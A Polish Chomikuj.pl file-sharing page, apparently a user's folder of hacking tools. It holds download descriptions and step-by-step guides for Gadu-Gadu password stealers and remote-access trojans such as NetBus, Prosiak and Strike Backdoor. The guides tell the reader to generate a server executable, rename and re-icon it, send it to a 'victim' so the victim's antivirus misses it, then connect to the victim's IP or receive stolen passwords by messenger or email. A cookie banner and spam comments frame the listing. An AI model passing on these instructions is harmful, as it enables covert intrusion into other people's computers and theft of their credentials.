Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto
keris1
  • Prezent Prezent
  • Ulubiony
    Ulubiony
  • Wiadomość Wiadomość

Mężczyzna Keri

widziany: 13.05.2026 10:33

  • pliki muzyczne
    8336
  • pliki wideo
    8127
  • obrazy
    9598
  • dokumenty
    8766

43853 plików
2776 GB

Opis został ukryty. Pokaż opis
FolderyFoldery
keris1
!! ZABAWY ZE ŚPIEWEM!!!
= PIOSENKI -IMIONA
►MOJE RYSUNKI
◘BAJKI DO SLUCHANIA◘
07- Piosenki na imiona
1. Dr.Web Security Space - Anti-virus 11.0.0.11162 Final PL
①. Pełny Windows 7 do instalacji na zewnętrznym dysku USB 32-64 Bit
 
32
32
3-4 latki
3-latki
ABC Komputera
ACE Mega CoDecS Pack 6.03 PRO
Akademia umysłu
AKORD (Kujaws.-Pomorski e)
AKWARYSTYKA
 
akwarystyka(1)
Astrologia!
Audiobooki
 
BARKAS
Beata i Marcin - Serca Dar
Boże Narodzenie - scenariusze
Braniewo z Lotu Ptaka
chomciu
 
◄Sztuczki na Chomiku '.'.'.'.'.'.'. '.'.'.'.'.'.'. '.'.'.'.'
ABC chomikowania
Czterolatki-PIOSE NKI
Dokumenty
Duchy paranormalne
Dynastia stara
 
Dynastia Colbych lektor pl
 
Dynastia Colbych Sezon 2 1985-87 Lektor pl
dzień w przedszkolu
Dzwieki do umilenia zycia sasiadowi
Dźwięki, odgłosy, efekty
Elektronika
 
Elementarz piosenki 1-18
filmy
 
Filmy - budowa domu
finanse osobiste, finanse domowe
 
Fotografika
 
APARAT FOTO
KAMERA HD
Galeria
Gawęda - Dziecięcy Zespół Harcerski
Gry PC
 
Hiren's BootCD 14.0
Humor
 
kawały itp
Kawały MP3
Ikony na pulpit komputera
Instalacja PPPoE w Windows
jasełka
Jednorękie Bandyty-Slot machine
 
21 Slot Machine Games (full)
Hot Spot PC-ENG 2008
Hoyle Slots-2009-201 0
kabarety
 
klanza
K-Lite Codec Pack Full 9.9.0
Kodeksy
 
Wzory Pism
komiksy
 
Króliczek Titou - Moja pierwsza płyta
Ks. Jan Twardowski
 
Jan Twardowski- Wiersze
Ks. Jan Twardowski - Przezroczystos c
Ksiazka Telefoniczna TP.SA
kursy encyklopedie porady książki
 
Łamigłówki
 
Obrazki logiczne
Puzzle
LATO LEŚNYCH LUDZI (1985)
Lato Leśnych Ludzi mp4
MALOWANKI DO DRUKU
mapy nawigacyjne
 
Mapy różne stare i nowe
 
MARIOO
Masza i Niedźwiedź po Polsku
Modulator głosu - full version
moje obrazy olejne
moje programy pc
 
ściągnięte
moje rysunki cienkopisem
moje rysunki kredkami
moje rysunki ołówkiem
moje zdjęcia
 
Bociany
Nowy folder
Pieski i Kotki
Muzyka relaksacyjna medytacje itp
 
My i nasze problemy
 
nasze środowisko
 
Nauka gry na instrumentach
 
Nawigacje
 
nuta
 
Nutka -Izabela
 
+++NASZA KLASA
Obrazy Płyt CD i DVD
Od projektu po dom
Piosenki dla dzieci
piosenki dla najmlodszych
piosenki o zawodach
piosenki o zimie
piosenki o zwierzętach
Playlisty
Płyta ABC zabawy muzyczne trzylatków
Płyta Bawię się i uczę Roczne przygotowanie przedszkolne cz 1
Płyta Bawię się i uczę Roczne przygotowanie przedszkolne cz 2
Płyta Dziecięce teatrzyki cz 1
Płyta Dziecięce teatrzyki cz 2
Płyta Kodeks przedszkolaka
Płyta Wesołe przedszkole trzylatka
Podkłady mp3-Przeboje dziecięce
poezja
 
Poezja romantyczna
 
Poezja mp3
Romantyczne wiersze z obrazkami
poezja spiewana
 
programy PC
 
3D Home Architekt PL
Hacking-ceso
Haki Trojany itp
Pakiety biurowe,edytor y dokumentów,i ich konwektory
 
Portable (bezinstalacyj ne)
 
Programy
 
Ubuntu 10PL
programy - kilka w jednym
 
►❏ AIMER SOFT KONWERTERY '.'.'.'.'.' .'.'.'.'.'. '.'.'.'.'.' .'.'
programy achiwizacja,ko pie zapasowe, odzyskiwanie plików
 
►❏ ACRONIC TRUE IMAGE PL '.'.'.'.'.' .'.'.'.'.'. '.'.'.'.'.' .'.'
Archiwizery
NORTON GHOST 15 PL
Programy Antywirusowe i Security
 
programy do analizy komputera - narzędziowe
 
programy do kosztorysowani a
programy do nagrywania i kopiowania płyt
 
programy do odtwarzania, obróbki i konwersji filmów i dzwięku + kodeki
 
programy do odzyskiwania danych
programy do projektowania
 
Autodesk AutoCAD v2010
AUTODESK KEYGEN 2010
programy do stron WWW i do netu
 
programy do syntezy mowy
 
IWONA 2 CRACK FULL VERSION DŁUGA LICENCJA
Programy graficzne
 
programy różne
 
programy systemowe i do zmian w systemach
►❏ 7 LITE FULL '.'.'.'.'.' .'.'.'.'.'. '.'.'.'.'.' .'.'
►❏ DIRECT-X '.'.'.'.'.' .'.'.'.'.'. '.'.'.'.'.' .'.'
Przeboje dziecięce mp3
Przedszkole czterolatka
przedwojenne Braniewo
 
Braniewo IIcz
Braunsberg
 
Moje prywatne
Zdj Braniewa po II wojnie św
Ratownictwo medyczne
 
Religia
 
religijne
Reset sezon 1
Reset sezon 2
Rodziewiczówna Maria
ruch przy muzyce
Sad i i ogród
 
scenariusze
Scenariusze zajęć przedszkole czterolatki
scenariusze(1)
Ścianki kolankowe
Senniki
serial dom
skuter
Sławomir
śmiejmy się
 
''Śpiew. brzdące 5''
Śpiewające brzdące - cz. 10
Śpiewające brzdące 7
Śpiewające brzdące 7(1)
Śpiewające brzdące cz. 9
śpiewające brzdące część 5
Śpiewające brzdace część 6
Symulatory
 
syntetyzator mowy
szkoła przetrwania
Szkolne
 
Lektury Szkolne + Opracowania
Tajna Historia Zimnej Wojny
Taśmy Bezpieki
Teledyski z poezją
Teledyski-śpiewaj ące zwierzątka
test kina domowego dolby digital 5.1 AC3
usypianki bobasa
WARTE OBEJRZENIA
wierszyki
Windows 10 Manager 3.0.6 (20.04.2019) MULTI-PL [ZAREJESTROWANA WERSJA]
Windows mobile - programy
 
WŁASNA FIRMA
WPS Office 2016 10.1.0.5507 PL
wspólnoty
 
przykładowe uchwały, regulaminy, pisma różne
uchwały i załączniki
współpraca z rodzicami
Wszystko dla dzieci
 
wszystko do przedszkola
 
W co się bawic z dziećmi
wszystko na komórkę
 
wszystko o grzybach
 
ATLAS GRZYBÓW
Atlas Grzybów
Grzyby (hasło grzybek)
wszystko systemy dos windows i linux itd
wykroje krawiecki
 
z linią melodyczną
zabawy
zachomikowane
 
zajęcia plastyczne
zespół albatros
znaczki oceny
Znaki Zodiaku
 
Znaki zodiaku Nr.2
Znaki zodiaku z opisem
🇬🇧 Gandalf’s Windows 10 PE Live USB Redstone 2018
Gandalfs Win8.1U1SE_x86 update portable 2018
Pokazuj foldery i treści
  • 0,6 MB
  • 15 lip 11 8:54
GG Remote Password Cracker v 2.0. Program służy do łamania haseł gg na własnym oraz zdalnym komputerze. Program potrafi wykraść listę kontaktów + hasło do profilu :] Co jest w nowej wersji: powstała zakładka "Opcje" która zawiera trochę przydatnych funkcji, ale więcej o tym w punkcie 3 ;]
1. Ściągamy skompresowany plik o nazwie "GG RPC2.zip". Następnie go rozpakowujemy i wchodzimy do folderu. Widzimy folder o nazwie "Ikony"i plik o nazwie "GG RPC2.exe", który odpalamy.
2. W pierwszej zakładce o nazwie "ŁAMACZ HASEŁ"
możemy złamać hasła znajdujące się na twoim komputerze wystarczy kliknąć przycisk i czekać aż program sam wyszuka i wydobędzie hasła z wszystkich plików config.dat. Screen:

3. Teraz przechodzimy do zakładki "Nr Gadu". Screen:

Będzie nam potrzebny dodatkowy numer gg, dlatego musimy założyć nowy numer.
W pierwsze pole o nazwie "NR GG SERVERA" wpisujemy drugi stworzony numer
natomiast w drugie pole o nazwie "HASŁO GG SERVERA" wpisujemy hasło do tego nowo stworzonego numeru. Zaś w trzecie pole wpisujemy swój prawdziwy numer gg i klikamy na opcję "Generuj". Powstaje skonfigurowany trojan o nazwie server.exe, którego nazwę i ikonę możemy zmienić. Nie wolno tylko zmieniać jego rozszerzenia, czyli musi pozostać rozszerzenie .exe. Ten plik który wygenerowaliśmy wysyłamy oczywiście do swojej ofiary. Wystarczy że ofiara otworzy plik i automatycznie zostaną przesłane hasła na nasze gg.
4. Teraz przechodzimy do zakładki "Opcje". Screen:

Opcje "Prześlij informacje o komputerze" zaznaczamy w przypadku gdy chcemy się dowiedzieć jakiego kompa ma ofiara.
Opcja "Prześlij screena" pozwala na przechwycenie obrazu pulpitu ofiary.
W zakładce "Opcje" możemy od razu wybrać ikonę dla trojana, czyli pliku serwer.

zachomikowany

  • 476 KB
  • 15 lip 11 8:54
GG Remote Password Cracker v 1.0. Program służy do łamania haseł gg na własnym oraz zdalnym komputerze. Program potrafi wykraść listę kontaktów + hasło do profilu :]
1. Ściągamy skompresowany plik o nazwie "GG RPC.zip". Następnie go rozpakowujemy i odpalamy plik o nazwie "GG RPC.exe"
2. W pierwszej zakładce o nazwie "ŁAMACZ HASEŁ"
możemy złamać hasła znajdujące się na twoim komputerze wystarczy kliknąć przycisk i czekać aż program sam wyszuka i wydobędzie hasła z wszystkich plików config.dat. Screen:

3. Teraz przechodzimy do zakładki "Nr Gadu". Screen:

Będzie nam potrzebny dodatkowy numer gg, dlatego musimy założyć nowy numer.
W pierwsze pole o nazwie "NR GG SERVERA" wpisujemy drugi stworzony numer
natomiast w drugie pole o nazwie "HASŁO GG SERVERA" wpisujemy hasło do tego nowo stworzonego numeru. Zaś w trzecie pole wpisujemy swój prawdziwy numer gg i klikamy na opcję "Generuj". Powstaje skonfigurowany trojan o nazwie server.exe, którego nazwę i ikonę możemy zmienić. Nie wolno tylko zmieniać jego rozszerzenia, czyli musi pozostać rozszerzenie .exe. Ten plik który wygenerowaliśmy wysyłamy oczywiście do swojej ofiary. Wystarczy że ofiara otworzy plik i automatycznie zostaną przesłane hasła na nasze gg.

zachomikowany

  • 0,6 MB
  • 15 lip 11 8:54
Program złodziej GG służy do wykradania plików config.dat i archives.dat.

Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Zlodziej GG v1.1.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Teraz odpalamy plik o nazwie: "Złodziej GG v1.1". Uruchamia się program widziany na screenie:

3. Uzupełniasz wszystkie ramki i klikasz na opcję "Generuj"
Teraz wysyłamy plik "sgg.exe" (możemy zmienić nazwę pliku) do osoby którą chcemy "okraść".

4. PRZYKŁADOWA KONFIGURACJA NA SKRZYNCE WP.PL:
-Email:
jankowalski@wp.pl
-Login:
jankowalski
-Hasło:
********
-Smtp:
smtp.wp.pl
-Port:
25

5. PRZYKŁADOWA KONFIGURACJA NA SKRZYNCE POCZTA.FM:
-Email:
jankowalski@poczta.fm
-Login:
jankowalski
-Hasło:
********
-Smtp:
www.poczta.fm
-Port:
25

zachomikowany

  • 2,2 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "l4n-tr0j4n v1.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy następujące foldery:
"FSG", "Klient", "Serwer", "Stub"
3. Najpierw wchodzimy do folderu "Serwer" i plik o nazwie "svchost.exe" wysyłamy do naszej ofiary. Ofiara musi ten plik otworzyć a jej antywir nic nie zczaić.
4. Następnie wchodzisz do folderu "Klient" i odpalasz plik o nazwie
"l4n-tr0j4n v1.0.exe". Uruchamia się program widziany na screenie w którym podajesz adres IP swojej ofiary i klikasz na Połącz.

5. Acha. Plik FSG który znajduje się w folderze FSG to binder.

zachomikowany

  • 1,7 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Mass Conect 2.0 beta.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"mc2.exe"
3. Odpalamy plik o nazwie "mc2.exe". Uruchamia się program widziany na screenie:

4. Najpierw klikamy na zakładkę "Ustawienia Klienta". Uruchomi się okienko widziane poniżej. Musimy je uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz"

5. Następnie musisz kliknąć na zakładkę "Ustawienia serwera". Uruchamia się program widziany na screenie, który należy uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz". Dzięki temu powstanie plik serwer.

6. Plik serwer który przed chwilą utworzyłeś należy wysłać do swojej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zczaić.
7. Na koniec otwierasz plik "mc2.exe" i wysyłasz odpowiednią komendę na serwer trojana.
PS: Więcej informacji o obsłudze trojana znajdziesz w pliku "Info.txt" w paczce.

zachomikowany

  • 2,7 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Nishica 1.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"Nishica.exe", "win98.exe", "winXp.exe", "ResHacker.exe"
3. Plik "win98.exe" lub "winXp.exe" (w zależności od wersji systemu jakiego używa nasza ofiara), musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. My zaś otwieramy plik "Nishica.exe". Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Połącz.

5. Acha plik"ResHacker.exe" może posłużyć np. do zmiany ikon.

zachomikowany

  • 1,8 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "NetBus.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"NetBus.exe", "Patch.exe".
3. Plik "Patch.exe", czyli serwer trojana musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. My zaś otwieramy plik "NetBus.exe". Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na Connect.

zachomikowany

  • 2,2 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Strike Backdoor 0.96.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"strike.exe", "server.exe".
3. Plik "server.exe" musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "strike.exe". Uruchamia się program widziany na screenie:

Klikamy na opcję "Połącz z komputerem zdalnym (serwerem)". Wyskakuje nam okienko w którym musimy podać HOST ofiary (który ustalamy np. na podstawie jej IP) i klikamy na opcję połącz.

zachomikowany

  • 1,6 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Skun 0.11.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"client_011.exe", "server_011.exe".
3. Plik "server_011.exe" musimy podesłać naszej ofiarze. Ofiara musi otworzyć ten plik a jej antywir nic nie zczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "client_011.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i swoje a potem klikamy na magiczną opcję Connect ;]

zachomikowany

  • 1,6 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Matrix 1.03.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"The_Matrix.exe", "server.exe", "server2 (bez konfiga).exe"
3. Plik "server.exe" lub "server2 (bez konfiga).exe" musimy podesłać naszej ofiarze, Ofiara musi go otworzyć a jej antywir nic nie zczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "The_Matrix.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Connect ;]

zachomikowany

  • 5,3 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Ramirez 2.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy foldery:
"klient", "serwer"
3. Wchodzimy do folderu "Serwer" i wysyłamy do naszej ofiary plik znajdujący się w tym folderze. Jest to plik o nazwie "scanlog.exe". Potem ofiara musi ten plik odpalić, a jej antywir nic nie zczaić.
4. My zaś wchodzimy do folderu o nazwie "klient" i odpalamy plik o nazwie "Klient.exe". Uruchamia się program widziany na screenie w którym musimy podać adres IP i kliknąć na opcję "Connect".

zachomikowany

  • 1,7 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "RMF FM 1.1.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
rmf.exe, setup.exe
3. Plik o nazwie setup.exe (czyli serwer) podrzucamy naszej ofiarze.
4. My zaś otwieramy plik o nazwie rmf.exe (czyli client). Uruchomi się program widziany na screenie, w którym musimy podać adres IP naszej ofiary i kliknąć na opcję "connect"


zachomikowany

  • 1,8 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Luzak 2.00.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
luzak_2.00.exe, server.exe
3. Plik o nazwie server.exe wysyłamy do naszej ofiary.
4. My zaś otwieramy plik o nazwie luzak_2.00.exe. Uruchamia się program widziany na screenie, w ktorym podajemy adres IP naszej ofiary i klikamy na Connect

zachomikowany

  • 1,9 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Snape 1.2"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
klient.exe, server.exe
3. Plik o nazwie serwer.exe podrzucamy naszej ofiarze.
4. My zaś otwieramy plik klient.exe, klikamy na zakładkę "Połączenie", w której podajemy adres IP ofiary i klikamy na "Połącz"



zachomikowany

  • 1,9 MB
  • 15 lip 11 8:54
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Prosiak 0.70 beta 7"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"client.exe", "konfig.exe"
3. Odpalamy plik "konfig.exe". Uruchomi się aplikacja widziana na screenie:

Dzięki niej stworzymy i odpowiednio skonfigurujemy serwer trojana.
Kiedy wszystko poprawnie wpisaliśmy klikamy na opcję "Zapisz"
4. Teraz plik serwer (który utworzyliśmy) wysyłamy do naszej ofiary. Ofiara musi go otworzyć.
5. My zaś otwieramy plik "client.exe". Uruchamia się aplikacja widziana na screenie:

Podajemy adres IP naszej ofiary, port i hasło jakie wpisaliśmy w "konfig.exe" do naszego backdoora. No i się łączymy z jej kompem ;]

zachomikowany

  • Pobierz folder
  • Aby móc przechomikować folder musisz być zalogowanyZachomikuj folder
  • dokumenty
    0
  • obrazy
    0
  • pliki wideo
    0
  • pliki muzyczne
    0

15 plików
27,67 MB




wagnerka9595

wagnerka9595 napisano 5.06.2022 19:35

zgłoś do usunięcia
obrazek
xejowoy183

xejowoy183 napisano 30.12.2022 02:33

zgłoś do usunięcia
Super chomik
brzeska11

brzeska11 napisano 6.03.2023 12:55

zgłoś do usunięcia
Pozdrawiam i zapraszam, najnowsze seriale, rzadkie książki, i trudne do znalezienia filmy, 3d SBS 360 : Brzeska Rare Files . . . THE EXPANSE . . . Hit-Monkey . . . LOVE+DEATH+ROBOTS . . . PERYFERAL . . . Kevin Can Fuck Himself . . . JESTEM GROOT . . . DZICZ. THE WILDS . . . AVENGERS. Earth's Mightiest Heroes. . . . FILMY . . . SERIALE . . . KSIĄŻKI . . . 360 SBS VR Porn, Porno wirtualne na smartfona, CARDBOARD . . . ARCHEOLOGIA . . . FANTASY . . . SCIENCE FICTION . . . GRY RPG . . . BAJKI, ANIMACJE . . .
jegah58199

jegah58199 napisano 9.05.2023 08:30

zgłoś do usunięcia
Zapraszam
Ksiazki_20

Ksiazki_20 napisano 19.08.2024 11:00

zgłoś do usunięcia
Najlepszyy5221

Najlepszyy5221 napisano 26.12.2024 01:37

zgłoś do usunięcia
Zapraszam
chomus54

chomus54 napisano 17.04.2025 11:27

zgłoś do usunięcia
obrazek Zapraszam po kawał dobrej muzy nowości i nie tylko
Back2Rave

Back2Rave napisano 13.09.2025 19:21

zgłoś do usunięcia

Musisz się zalogować by móc dodawać nowe wiadomości do tego Chomika.

Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności